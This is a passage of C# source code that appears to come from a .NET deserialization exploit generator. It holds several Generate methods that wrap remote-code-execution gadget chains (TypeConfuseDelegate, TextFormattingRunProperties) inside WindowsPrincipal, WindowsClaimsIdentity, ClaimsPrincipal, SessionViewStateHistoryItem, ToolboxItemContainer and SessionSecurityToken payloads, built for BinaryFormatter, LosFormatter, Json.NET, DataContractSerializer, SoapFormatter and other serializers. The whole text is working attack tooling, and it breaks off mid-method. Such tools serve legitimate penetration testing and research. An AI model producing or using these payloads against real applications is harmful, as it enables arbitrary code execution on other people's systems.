public override object Generate(string formatter, InputArgs inputArgs)
{
Generator generator = new TypeConfuseDelegateGenerator();
WindowsIdentity id = WindowsIdentity.GetCurrent();
id.Actor = new ClaimsIdentity();
id.Actor.BootstrapContext = TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs);
BinaryFormatter bf = new BinaryFormatter();
var ms = new MemoryStream();
bf.Serialize(ms, id);
byte[] gadget = ms.ToArray();
string b64encoded = Convert.ToBase64String(gadget);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
{
WindowsPrincipalMarshal obj = new WindowsPrincipalMarshal();
obj.wi = id;
return(Serialize(obj, formatter, inputArgs));
}
else if (formatter.ToLower().Equals("json.net"))
{
string payload = @"{
'$type': 'System.Security.Principal.WindowsPrincipal, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'Identity':{
'$type':'System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'System.Security.ClaimsIdentity.actor': '" + b64encoded + @"'
}
}";
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = JSONMinifier.Minify(payload, new string[] { "mscorlib" }, null);
}
else
{
payload = JSONMinifier.Minify(payload, null, null);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.JsonNet_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("datacontractserializer"))
{
string payload = $@"<root type=""System.Security.Principal.WindowsPrincipal, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<WindowsPrincipal xmlns=""http://schemas.datacontract.org/2004/07/System.Security.Principal"" xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" >
<m_identity>
<System.Security.ClaimsIdentity.actor i:type=""x:string"" xmlns="""" xmlns:x=""http://www.w3.org/2001/XMLSchema"" >
{b64encoded}
</System.Security.ClaimsIdentity.actor>
</m_identity>
</WindowsPrincipal>
</root>";
// this will break the payload, because x is used! todo for @irsdl: fix the xslt in XMLMinifier.cs to have the option to include "unused variables"
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null);
}
else
{
payload = XMLMinifier.Minify(payload, null, null);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type");
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("netdatacontractserializer"))
{
string payload = $@"
<WindowsPrincipal z:Type=""System.Security.Principal.WindowsPrincipal"" z:Assembly=""mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns=""http://schemas.datacontract.org/2004/07/System.Security.Principal"" xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" >
<m_identity z:Type=""System.Security.Principal.WindowsIdentity"" z:Assembly=""mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" >
<System.Security.ClaimsIdentity.actor z:Type=""System.String"" z:Assembly=""0"" xmlns="""">
{b64encoded}
</System.Security.ClaimsIdentity.actor>
</m_identity>
</WindowsPrincipal>";
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null);
}
else
{
payload = XMLMinifier.Minify(payload, null, null);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.NetDataContractSerializer_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("datacontractjsonserializer"))
{
string payload = "{\"__type\":\"WindowsPrincipal:#System.Security.Principal\",\"m_identity\":{\"System.Security.ClaimsIdentity.actor\":\"" + b64encoded + "\"}}";
// this is unsupported for this formatter
if (inputArgs.Minify || inputArgs.UseSimpleType)
{
}
if (inputArgs.Test)
{
try
{
SerializersHelper.DataContractJsonSerializer_deserialize(payload, typeof(WindowsPrincipal).AssemblyQualifiedName, null);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("soapformatter"))
{
string payload = $@"
<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC= ""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
<SOAP-ENV:Body>
<a1:WindowsPrincipal xmlns:a1=""http://schemas.microsoft.com/clr/ns/System.Security.Principal"">
<m_identity href = ""#ref-2"" />
<m_roles xsi:null=""1"" />
<m_rolesTable xsi:null=""1"" />
<m_rolesLoaded>false</m_rolesLoaded>
</a1:WindowsPrincipal>
<a1:WindowsIdentity id=""ref-2"" xmlns:a1=""http://schemas.microsoft.com/clr/ns/System.Security.Principal"">
<System.Security.ClaimsIdentity.actor>{b64encoded}</System.Security.ClaimsIdentity.actor>
</a1:WindowsIdentity>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>";
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null, FormatterType.SoapFormatter);
}
else
{
payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.SoapFormatter_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else
{
throw new Exception("Formatter not supported");
}
}
public override object Generate(string formatter, InputArgs inputArgs)
{
Generator generator = new TextFormattingRunPropertiesGenerator();
byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
string b64encoded = Convert.ToBase64String(binaryFormatterPayload);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("objectstateformatter", StringComparison.OrdinalIgnoreCase))
{
Object obj = null;
if (variant_number == 2)
{
obj = new WindowsClaimsIdentityMarshal_var2(b64encoded);
}
else if (variant_number == 3)
{
obj = new WindowsClaimsIdentityMarshal_var3(b64encoded);
}
else
{
obj = new WindowsClaimsIdentityMarshal_var1(b64encoded);
}
return(Serialize(obj, formatter, inputArgs));
}
else if (formatter.ToLower().Equals("json.net"))
{
string payload = "";
if (variant_number == 2)
{
payload = @"{
'$type': 'Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35',
'System.Security.ClaimsIdentity.bootstrapContext': '" + b64encoded + @"'
}";
}
else
{
payload = @"{
'$type': 'Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35',
'System.Security.ClaimsIdentity.actor': '" + b64encoded + @"'
}";
}
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = JSONMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null);
}
else
{
payload = JSONMinifier.Minify(payload, null, null);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.JsonNet_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("datacontractserializer"))
{
string payload = "";
if (variant_number == 2)
{
payload = $@"<root type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"">
<WindowsClaimsIdentity xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/Microsoft.IdentityModel.Claims"">
<System.Security.ClaimsIdentity.bootstrapContext i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.bootstrapContext>
</WindowsClaimsIdentity>
</root>";
}
else
{
payload = $@"<root type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"">
<WindowsClaimsIdentity xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/Microsoft.IdentityModel.Claims"">
<System.Security.ClaimsIdentity.actor i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor>
</WindowsClaimsIdentity>
</root>";
}
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null);
}
else
{
payload = XMLMinifier.Minify(payload, null, null);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type");
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("netdatacontractserializer"))
{
string payload = "";
if (variant_number == 2)
{
payload = $@"<root>
<w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" z:Type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity"" z:Assembly=""Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns="""">
<System.Security.ClaimsIdentity.actor z:Type=""System.String"" z:Assembly=""0"">{b64encoded}</System.Security.ClaimsIdentity.actor>
</w>
</root>
";
}
else if (variant_number == 3)
{
payload = $@"<root>
<w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" z:Type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity"" z:Assembly=""Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns="""">
<System.Security.ClaimsIdentity.bootstrapContext z:Type=""System.String"" z:Assembly=""0"">{b64encoded}</System.Security.ClaimsIdentity.bootstrapContext>
</w>
</root>
";
}
else
{
payload = $@"<root>
<w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" z:Type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity"" z:Assembly=""Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns="""">
<_actor z:Type=""System.String"" z:Assembly=""0"" >{b64encoded}</_actor>
<m_userToken z:Type=""System.IntPtr"" z:Assembly=""0"" xmlns="""">
<value z:Type=""System.Int64"" z:Assembly=""0"">0</value>
</m_userToken>
<_label i:nil=""true""/>
<_nameClaimType i:nil=""true""/>
<_roleClaimType i:nil=""true""/>
</w>
</root>
";
}
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null);
}
else
{
payload = XMLMinifier.Minify(payload, null, null);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.NetDataContractSerializer_deserialize(payload, "root");
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("soapformatter"))
{
string payload = "";
if (variant_number == 2)
{
payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
<SOAP-ENV:Body>
<a1:WindowsClaimsIdentity id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/Microsoft.IdentityModel.Claims/Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"">
<System.Security.ClaimsIdentity.bootstrapContext xsi:type=""xsd:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.bootstrapContext>
</a1:WindowsClaimsIdentity>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
";
}
else
{
payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
<SOAP-ENV:Body>
<a1:WindowsClaimsIdentity id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/Microsoft.IdentityModel.Claims/Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"">
<System.Security.ClaimsIdentity.actor xsi:type=""xsd:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor>
</a1:WindowsClaimsIdentity>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
";
}
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null, FormatterType.SoapFormatter);
}
else
{
payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.SoapFormatter_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else
{
throw new Exception("Formatter not supported");
}
}
public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] rceGadget = (byte[])(new TypeConfuseDelegateGenerator()).GenerateWithNoTest("BinaryFormatter", inputArgs);
string b64encoded = Convert.ToBase64String(rceGadget);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
{
string payload_bf_json = @"[{'Id': 1,
'Data': {
'$type': 'SerializationHeaderRecord',
'binaryFormatterMajorVersion': 1,
'binaryFormatterMinorVersion': 0,
'binaryHeaderEnum': 0,
'topId': 1,
'headerId': -1,
'majorVersion': 1,
'minorVersion': 0
}},{'Id': 2,
'TypeName': 'ObjectWithMapTyped',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 4,
'objectId': 1,
'name': 'System.Security.Claims.ClaimsPrincipal',
'numMembers': 1,
'memberNames':['m_serializedClaimsIdentities'],
'binaryTypeEnumA':[1],
'typeInformationA':[null],
'typeInformationB':[null],
'memberAssemIds':[0],
'assemId': 0
}},{'Id': 10,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 5,
'value': '" + b64encoded + @"'
}},{'Id': 11,
'TypeName': 'MessageEnd',
'Data': {
'$type': 'MessageEnd'
}}]";
MemoryStream ms = AdvancedBinaryFormatterParser.JsonToStream(payload_bf_json);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase))
{
if (inputArgs.Test)
{
try
{
ms.Position = 0;
System.Runtime.Serialization.Formatters.Binary.BinaryFormatter bf = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter();
bf.Deserialize(ms);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(ms.ToArray());
}
else
{
// it is LosFormatter
byte[] lfSerializedObj = SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(ms.ToArray());
MemoryStream ms2 = new MemoryStream(lfSerializedObj);
ms2.Position = 0;
if (inputArgs.Test)
{
try
{
System.Web.UI.LosFormatter lf = new System.Web.UI.LosFormatter();
lf.Deserialize(ms2);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(lfSerializedObj);
}
}
else if (formatter.ToLower().Equals("soapformatter"))
{
string payload = "";
payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
<SOAP-ENV:Body>
<a1:ClaimsPrincipal id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/ns/System.Security.Claims"">
<m_serializedClaimsIdentities id=""ref-5"">{b64encoded}</m_serializedClaimsIdentities>
</a1:ClaimsPrincipal>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
";
if (inputArgs.Minify)
{
payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.SoapFormatter_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else
{
throw new Exception("Formatter not supported");
}
}
public override object Generate(string formatter, InputArgs inputArgs)
{
Generator generator = new TextFormattingRunPropertiesGenerator();
string losFormatterText = Encoding.UTF8.GetString((byte[])generator.GenerateWithNoTest("LosFormatter", inputArgs));
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("objectstateformatter", StringComparison.OrdinalIgnoreCase))
{
var obj = new SessionViewStateHistoryItemMarshal(losFormatterText);
return(Serialize(obj, formatter, inputArgs));
}
else if (formatter.ToLower().Equals("json.net"))
{
string payload = "{'$type': 'System.Web.UI.MobileControls.SessionViewState+SessionViewStateHistoryItem, System.Web.Mobile, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a', 's':'" + GetB64SessionToken(losFormatterText) + "'}";
if (inputArgs.Minify)
{
// by default JsonSerializerSettings.TypeNameAssemblyFormat is set to Simple so we can remove the version etc from the assembly name
// see https://www.newtonsoft.com/json/help/html/P_Newtonsoft_Json_JsonSerializerSettings_TypeNameAssemblyFormat.htm
// if TypeNameAssemblyFormat == Full , then we have to keep the full name
payload = JSONMinifier.Minify(payload, new string[] { "System.Web.Mobile" }, null);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.JsonNet_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("datacontractserializer"))
{
string payload = $@"<root type=""System.Web.UI.MobileControls.SessionViewState+SessionViewStateHistoryItem, System.Web.Mobile, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""><SessionViewState.SessionViewStateHistoryItem xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""http://schemas.datacontract.org/2004/07/System.Web.UI.MobileControls"">
<s i:type=""x:string"" xmlns="""">{GetB64SessionToken(losFormatterText)}</s>
</SessionViewState.SessionViewStateHistoryItem></root>";
if (inputArgs.Minify)
{
payload = XMLMinifier.Minify(payload, null, null);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type");
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("netdatacontractserializer"))
{
string payload = $@"<root><w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" z:Id=""1"" z:Type=""System.Web.UI.MobileControls.SessionViewState+SessionViewStateHistoryItem"" z:Assembly=""System.Web.Mobile, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns="""">
<s z:Type=""System.String"" z:Assembly=""0"" xmlns="""">{GetB64SessionToken(losFormatterText)}</s>
</w></root>";
if (inputArgs.Minify)
{
payload = XMLMinifier.Minify(payload, null, null);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.NetDataContractSerializer_deserialize(payload, "root");
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("soapformatter"))
{
string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
<SOAP-ENV:Body>
<a1:SessionViewState_x002B_SessionViewStateHistoryItem id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.Web.UI.MobileControls/System.Web.Mobile%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db03f5f7f11d50a3a"">
<s>{GetB64SessionToken(losFormatterText)}</s>
</a1:SessionViewState_x002B_SessionViewStateHistoryItem>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
";
if (inputArgs.Minify)
{
payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.SoapFormatter_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else
{
throw new Exception("Formatter not supported");
}
}
public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] gadget = (byte[])SerializeWithNoTest(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs), "binaryformatter", inputArgs);
string b64encoded = Convert.ToBase64String(gadget);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
{
var obj = new ToolboxItemContainerMarshal(gadget);
return(Serialize(obj, formatter, inputArgs));
}
else if (formatter.ToLower().Equals("soapformatter"))
{
string payload = $@"
<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
<SOAP-ENV:Body>
<a1:ToolboxItemContainer id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.Drawing.Design/System.Drawing.Design%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db03f5f7f11d50a3a"">
<TbxIC_DataObjectFormats href=""#ref-3""/>
<TbxIC_DataObjectValues href=""#ref-4""/>
</a1:ToolboxItemContainer>
<SOAP-ENC:Array id=""ref-3"" SOAP-ENC:arrayType=""xsd:string[1]"">
<item id=""ref-5"">CF_TOOLBOXITEMCONTAINER_CONTENTS</item>
</SOAP-ENC:Array>
<SOAP-ENC:Array id=""ref-4"" SOAP-ENC:arrayType=""xsd:anyType[1]"">
<item href=""#ref-6""/>
</SOAP-ENC:Array>
<a1:ToolboxItemContainer_x002B_ToolboxItemSerializer id=""ref-6"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.Drawing.Design/System.Drawing.Design%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db03f5f7f11d50a3a"">
<AssemblyName href=""#ref-7""/>
<Stream href=""#ref-8""/>
</a1:ToolboxItemContainer_x002B_ToolboxItemSerializer>
<a3:AssemblyName id=""ref-7"" xmlns:a3=""http://schemas.microsoft.com/clr/ns/System.Reflection"">
<_Name id=""ref-9"">mscorlib</_Name>
<_PublicKeyToken xsi:null=""1""/>
<_CultureInfo>127</_CultureInfo>
<_CodeBase id=""ref-11"">file:///C:/Windows/Microsoft.NET/Framework/v4.0.30319/mscorlib.dll</_CodeBase>
<_HashAlgorithm xsi:type=""a4:AssemblyHashAlgorithm"" xmlns:a4=""http://schemas.microsoft.com/clr/ns/System.Configuration.Assemblies"">SHA1</_HashAlgorithm>
<_HashAlgorithmForControl xsi:type=""a4:AssemblyHashAlgorithm"" xmlns:a4=""http://schemas.microsoft.com/clr/ns/System.Configuration.Assemblies"">None</_HashAlgorithmForControl>
<_StrongNameKeyPair xsi:null=""1""/>
<_Flags xsi:type=""a3:AssemblyNameFlags"" xmlns:a3=""http://schemas.microsoft.com/clr/ns/System.Reflection"">33</_Flags>
</a3:AssemblyName>
<SOAP-ENC:Array id=""ref-8"" xsi:type=""SOAP-ENC:base64"">{b64encoded}</SOAP-ENC:Array>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>";
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null, FormatterType.SoapFormatter);
}
else
{
payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.SoapFormatter_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else
{
throw new Exception("Formatter not supported");
}
}
public override object Generate(string formatter, InputArgs inputArgs)
{
Generator generator = new TextFormattingRunPropertiesGenerator();
byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
string b64encoded = Convert.ToBase64String(binaryFormatterPayload);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("objectstateformatter", StringComparison.OrdinalIgnoreCase))
{
var obj = new SessionSecurityTokenMarshal(b64encoded);
return(Serialize(obj, formatter, inputArgs));
}
else if (formatter.ToLower().Equals("json.net"))
{
string payload = "{'$type': 'System.IdentityModel.Tokens.SessionSecurityToken, System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'SessionToken':{'$type':'System.Byte[], mscorlib','$value':'" + GetB64SessionToken(b64encoded) + "'}}";
if (inputArgs.Minify)
{
payload = JSONMinifier.Minify(payload, new string[] { "System.IdentityModel" }, null);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.JsonNet_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("datacontractserializer"))
{
string payload = $@"<root type=""System.IdentityModel.Tokens.SessionSecurityToken, System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""><SessionSecurityToken xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""http://schemas.datacontract.org/2004/07/System.IdentityModel.Tokens"">
<SessionToken i:type=""x:base64Binary"" xmlns="""">{GetB64SessionToken(b64encoded)}</SessionToken>
</SessionSecurityToken></root>";
if (inputArgs.Minify)
{
payload = XMLMinifier.Minify(payload, null, null);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type");
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("netdatacontractserializer"))
{
string payload = $@"<root><w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" z:Id=""1"" z:Type=""System.IdentityModel.Tokens.SessionSecurityToken"" z:Assembly=""System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns="""">
<SessionToken z:Type=""System.Byte[]"" z:Assembly=""0"" xmlns="""">{GetB64SessionToken(b64encoded)}</SessionToken>
</w></root>";
if (inputArgs.Minify)
{
payload = XMLMinifier.Minify(payload, null, null);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.NetDataContractSerializer_deserialize(payload, "root");
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("soapformatter"))
{
